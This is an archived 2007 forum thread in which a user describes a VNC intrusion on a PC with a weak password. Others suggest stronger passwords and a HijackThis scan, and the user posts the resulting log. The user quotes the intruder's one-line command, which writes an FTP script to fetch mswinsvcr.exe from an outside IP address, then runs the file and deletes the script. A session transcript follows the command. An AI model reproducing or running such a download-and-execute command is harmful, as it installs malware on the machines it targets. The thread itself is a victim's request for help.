PDA

View Full Version : Been hacked ...



Geek4414
14-09-2007, 06:22 PM
I have been experimenting with VPN and VNC on a PC and only had a very weak password on it. Someone or a bot has hacked in and tried to download some malware to it.

I think the firewall has blocked the download of the exe. I did a quick search in the CMD window and it is disturbing to find the file "eq" physically on this PC's user folder, this file contains the script in the FTP screen cap below and mswinsvcr.exe is also there but a zero byte file. I can't delete the file from the command prompt, the system complaints that it's being used by another process. I can however delete it from Explorer. Very Strange.

Neither NOD32 nor Ad-Aware 2007 picked up any nasties, so should I be concerned?

This CMD window was left on the screen when I looked at the PC this afternoon ...

C:\Documents and Settings\M1>%systemroot%\system32\cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\M1>del eq&echo open 222.82.66.236 27168 >> eq&ech
o user 12592 13533 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n
-s:eq &mswinsvcr.exe &del eq
Could Not Find C:\Documents and Settings\M1\eq
ftp> open 222.82.66.236 27168
Connected to 222.82.66.236.
220 StnyFtpd 0wns j0
ftp> user 12592 13533
331 Password required
230 User logged in.
ftp> get mswinsvcr.exe
200 PORT command successful.
150 Opening BINARY mode data connection



P.S. The login password for the user and the VNC password have been changed to a much more stronger password now.

winmacguy
14-09-2007, 06:29 PM
You might want to use a stronger password. Also you could download and run HiJackThis from Speedy's sig and run it, then post the log file on the forum for a diagnostic.

Geek4414
14-09-2007, 06:53 PM
You might want to use a stronger password. Also you could download and run HiJackThis from Speedy's sig and run it, then post the log file on the forum for a diagnostic.

Thanks WinMacGuy, I might do that this weekend.

I installed MS Monitor 3.1 on that PC and have it logging the network activity over the weekend. I just noticed a bunch of ICMP messages from China (same city as the hack from yesterday), so the person or bot is still sniffing around.

My concern is how did they download a script and execute it on this PC. I suspect it's a bot, since a real cracker wouldn't leave the CMD window opened. To be honest, without the cmd window being there, I probably would never have guessed that the PC has been compromised.

How can we prevent scripts from sneaking in? I had to turn off the firewall on the SMC router as one of the Citrix web app would not run with it on, even if I opened up port 443 for special applications.

While on the subject of the Citrix web app, it has been timing out badly over the past few days. The support desk for the app suggested that it's either the local LAN or the internet router choking up. What are the best tools to check the LAN & the internet connection?

winmacguy
14-09-2007, 07:03 PM
If you run the HJT file from Speedy's sig now you could get an answer tonight. It only takes a few seconds to run it.
To answer you other question - your on a PC with a weak password which was probably hacked in a matter of minutes.

Geek4414
14-09-2007, 09:08 PM
Here is a HighJackThis log, can't see anything that look fishy ...


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:19:08 PM, on 9/14/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
C:\Program Files\Microsoft Network Monitor 3\netmon.exe
C:\WINDOWS\system32\cmd.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
E:\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [UniPrint] C:\Program Files\UniPrint\Client\SetDfltSettings.exe
O4 - HKCU\..\Run: [StartCCC] C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{E3784368-8D9B-408C-9102-B3323E6F3DFF}: NameServer = 202.27.184.3,202.27.184.5
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft AB - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

--
End of file - 4256 bytes

mainframemouse
14-09-2007, 11:35 PM
Hi, we've just had a similar attack. It happened while a user was working so it never got to fire off the CMD prompt. Has anyone got any more info on this, since it got through though our firewall?

Regards V